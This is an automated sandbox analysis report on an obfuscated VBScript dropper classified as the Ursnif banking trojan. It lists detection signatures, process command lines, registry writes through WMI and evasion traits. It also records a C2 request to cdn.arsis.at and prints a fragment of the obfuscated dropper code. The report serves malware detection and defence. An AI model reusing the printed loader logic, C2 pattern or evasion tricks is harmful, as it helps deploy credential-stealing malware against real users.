
Analysis Report description#_02923.vbs

Overview

General Information

Sample Name: description#_02923.vbs
MD5: de25f443cc3bd5ccf14d1b514e909bb3
SHA1: a74c82a1b059e4be6a234920092440948e40faf0
SHA256: 1dcd128cc38a01779a240eeaec7b498107509e15f5d806c483644d9c1e4b9b8b

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
Sigma detected: Regsvr32 Anomaly
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 4616 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_02923.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 3688 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 3488 cmdline: -s C:\Users\user\AppData\Local\Temp\qua.xpi MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5136 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6056 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5136 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source                                                                Rule                Description           Author        Strings
00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmp  JoeSecurity_Ursnif  Yara detected Ursnif  Joe Security
00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmp  JoeSecurity_Ursnif  Yara detected Ursnif  Joe Security
00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmp  JoeSecurity_Ursnif  Yara detected Ursnif  Joe Security
00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmp  JoeSecurity_Ursnif  Yara detected Ursnif  Joe Security
00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmp  JoeSecurity_Ursnif  Yara detected Ursnif  Joe Security

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
Source: Process started, Author: Florian Roth, Data: Command: -s C:\Users\user\AppData\Local\Temp\qua.xpi, CommandLine: -s C:\Users\user\AppData\Local\Temp\qua.xpi, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 3688, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\qua.xpi, ProcessId: 3488

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: cdn.arsis.at, Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\qua.xpi, Virustotal: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\qua.xpi, ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: description#_02923.vbs, Virustotal: Detection: 13%
Source: description#_02923.vbs, ReversingLabs: Detection: 14%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\qua.xpi, Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02AB258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: Joe Sandbox View, IP Address: 47.241.8.147 47.241.8.147
Source: Joe Sandbox View, IP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox View, IP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox View, ASN Name: unknown unknown
Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic, HTTP traffic detected:
GET /api1/kavq20141UbTiMI/D1bYgxGqLXWXburuip/wRxkKnN2R/bAB7_2FyKfxN5qY0jr8G/SM7fP8YVqb4g_2BVVqt/tZUJwJyGXQhcto0P1kyrir/rgT4EnFKzg83S/IEYvtQeG/dFBcYYUBt5YkQ3_2FXN9h28/_2Bcnv7T6c/wiACIVMWAOU8kb7mG/1_2BEgNp7naW/sf7RBC82nnz/3UZaJHtR2QAVcb/G2o59qF6QItsK4t2bJrWD/VevZnNOZ6K4hvNML/63Y4HPK2zFEXcK_/0A_0D9HpzaL8HOZGvb/PTtBbjnLR/_2BJ_2Be3RUUV3ws0qSm/hsW_2B7c/nBj HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: cdn.arsis.at
Connection: Keep-Alive
Source: msapplication.xml0.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xe101779e,0x01d64a99</date><accdate>0xe101779e,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xe101779e,0x01d64a99</date><accdate>0xe101779e,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xe108eaed,0x01d64a99</date><accdate>0xe108eaed,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xe108eaed,0x01d64a99</date><accdate>0xe10b6080,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xe10dd60a,0x01d64a99</date><accdate>0xe10dd60a,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.11.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xe10dd60a,0x01d64a99</date><accdate>0xe10dd60a,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown, DNS traffic detected: queries for: iplogger.org
Source: global traffic, HTTP traffic detected:
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 24 Jun 2020 17:39:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmp, String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmp, String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmp, String found in binary or memory: http://cps.letsencrypt.org0
Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmp, String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmp, String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmp, String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: msapplication.xml.11.dr, String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.11.dr, String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.11.dr, String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.11.dr, String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.11.dr, String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.11.dr, String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.11.dr, String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.11.dr, String found in binary or memory: http://www.youtube.com/
Source: wscript.exe, 00000000.00000003.805204256.0000020AC75D1000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.826782340.0000020AC78BF000.00000004.00000001.sdmp, String found in binary or memory: https://iplogger.org/
Source: wscript.exe, 00000000.00000003.821482711.0000020AC43C5000.00000004.00000001.sdmp, String found in binary or memory: https://iplogger.org/1bD467
Source: wscript.exe, 00000000.00000002.824643402.0000020AC43BE000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.805310992.0000020AC7614000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.825367827.0000020AC54C5000.00000004.00000001.sdmp, String found in binary or memory: https://iplogger.org/1bP467
Source: wscript.exe, 00000000.00000002.826782340.0000020AC78BF000.00000004.00000001.sdmp, String found in binary or memory: https://iplogger.org/BP
Source: unknown, Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49735

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match, File source: 00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075739396.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075639616.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075243511.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075382255.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 3488, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match, File source: 00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075739396.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075639616.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075243511.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075382255.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 3488, type: MEMORY

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe, Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E215F3 NtMapViewOfSection,
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E218DB NtCreateSection,memset,
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E22775 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02AB3A67 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02ABAEB5 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E22554
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02ABAC94
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02AB15D6
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\qua.xpi 49FC4C06CF9FFA149CE9D9D03F354197B54B605291FC94835FAB1ABE9E9C9626
Source: description#_02923.vbs, Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\regsvr32.exe, Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: sfc.dll
Source: classification engine, Classification label: mal100.bank.troj.evad.winVBS@7/16@2/2
Source: C:\Program Files\internet explorer\iexplore.exe, File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_02923.vbs'
Source: C:\Windows\System32\wscript.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe, File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: description#_02923.vbs, Virustotal: Detection: 13%
Source: description#_02923.vbs, ReversingLabs: Detection: 14%
Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_02923.vbs'
Source: unknown, Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi
Source: unknown, Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\qua.xpi
Source: unknown, Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5136 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\qua.xpi
Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5136 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: description#_02923.vbs, Static file information: File size 1079613 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Source: Binary string: c:\Quite\pitch\east\And\Even\start\middle\next.pdb source: wscript.exe, 00000000.00000003.796072440.0000020AC43DE000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1195202541.0000000072E4A000.00000002.00020000.sdmp, qua.xpi.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe, Anti Malware Scan Interface: WScript.ScriptName, cStr(270546191)) > 0 And dMGq = 0) ThenExit FunctionEnd IfJDE = 15if (JDE > ((53 - 6.0) + (-(48 - (35 + (-24.0)))))) Thenflw = Array(203)Dim neuron:Set neuron = CreateObject("WScript.Shell")sqTSE = neuron.RegRead("HKEY_CURRENT_USER\Control Panel\International\Geo\Nation")For Each hind In flwIf (hind = Cint(sqTSE)) ThenREM Steven mulatto technology resiny Bauhaus Cummins conservator. cumbersome Strom hasp mandrill too procaine extirpate sergeant, 6138352 Judaism sale typewritten farmhouse deuteron Malagasy delineate gossamer adolescent, marital Ferguson homogeneity. evaporate Ephraim hair, 7115897 failure. Platonism decode antiquarian, 5508839 militia embargo director coruscate wreath40("")BlombergFujitsuWScript.Quit' flatulent Frye sinew Ulster Debussy spectrometer parade Carbone, Thoreau anyone Grayson polecat panther Morrison apache psychophysic, whimsey executrix Dailey sucrose buxom memory victim flipflop inboard. 1947492 emphatic fluorite Greenbelt End IfNext' progress buteo fungicide nameplate Bolton mockernut Gilchrist click sexy, beady. myocardial phalarope sigma Dorado lump umbra Alton246 wilful foxhole103 psychosomatic ironbound forgo cubit stratospheric motive, 2477469 shift chief Nigeria End ifEnd FunctionFunction Fujitsu()inventive = MsgBox("The program cant start because MSVCR100.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")End FunctionFunction zJOk()REM foothill807 seraphim tarnish Levis. figaro rambunctious fail doomsday disembowel bug permute315 seder sabra whatever morsel bottle ingather curb entrant pudding, 771336 phobic mystic methyl. inapt on error resume next' hydrodynamic. 2432209 airflow chromosomal Jacques those millenarian Lynn trivia. 7572830 Janus happen303 jackdaw. 
aliphatic aggregate Rosetta Tarrytown McLeod bookmark medic902 relevant Caracas Hindu cadre cannel Barrett bookbind soar shortcoming, Pauli If (InStr(WScript.ScriptName, cStr(270546191)) > 0 And dMGq = 0) ThenExit FunctionEnd Ifset SxK = GetObject("winmgmts:\\.\root\cimv2")set jPuBlOS = SxK.InstancesOf("Win32_OperatingSystem")REM thou impartation Welles ibid arsenide mediate autopsy deprave soar435 majestic, 7805098 candlelight broad Formosa rotary handbook sweep Blackwell jive sandwich automorphism. hereditary lovebird, 2350665 woodcut develop evocate peanut blitz solipsism impasse symbolic riverbank ventilate searchlight orthodontic detriment oratoric vacuole for each surmount in jPuBlOS' eggplant, 1640424 beehive stinkbug Matson laconic chianti visitor. 6763580 failsafe Strickland triphammer glandular parabola mannitol ANSI Dow megabyte. quota deed wigging. Toni = surmount.LastBootUpTimeREM season hillock grief Dairylea jejune slurry, 2899406 Kaufman colonel pragmatic packet Hellenic545 veterinary. Rockefeller polymeric bough Bahama life Waterman common businessmen dolce hunk Bridget. inhabitant deformation polyandrous market Katowice anam
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E224F0 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E22543 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02ABAC83 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02ABED26 pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_02ABA950 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E356F4 push es; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E35EC4 push dword ptr [ebp+597C1BE8h]; retf
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E37A7B push ebp; ret
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E38003 push ebp; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E347EE push edi; ret
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E37BD0 push ebp; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E34F90 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E627E2 push ds; retf
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_72E6237B push edx; ret

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\qua.xpi
Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\qua.xpi

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match, File source: 00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075739396.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075639616.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075243511.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.1075382255.0000000005168000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 3488, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe, File deleted: c:\users\user\desktop\description#_02923.vbs
Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe, Process information set: NOOPENFILEERRORBOX

            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\wscript.exe TID: 3836 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe | Last function: Thread delayed
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AB258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
            Source: wscript.exe, 00000000.00000002.827105716.0000020AC82D0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000003.804609988.0000020AC54DB000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.827105716.0000020AC82D0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.827105716.0000020AC82D0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.827105716.0000020AC82D0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72E21FA6 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
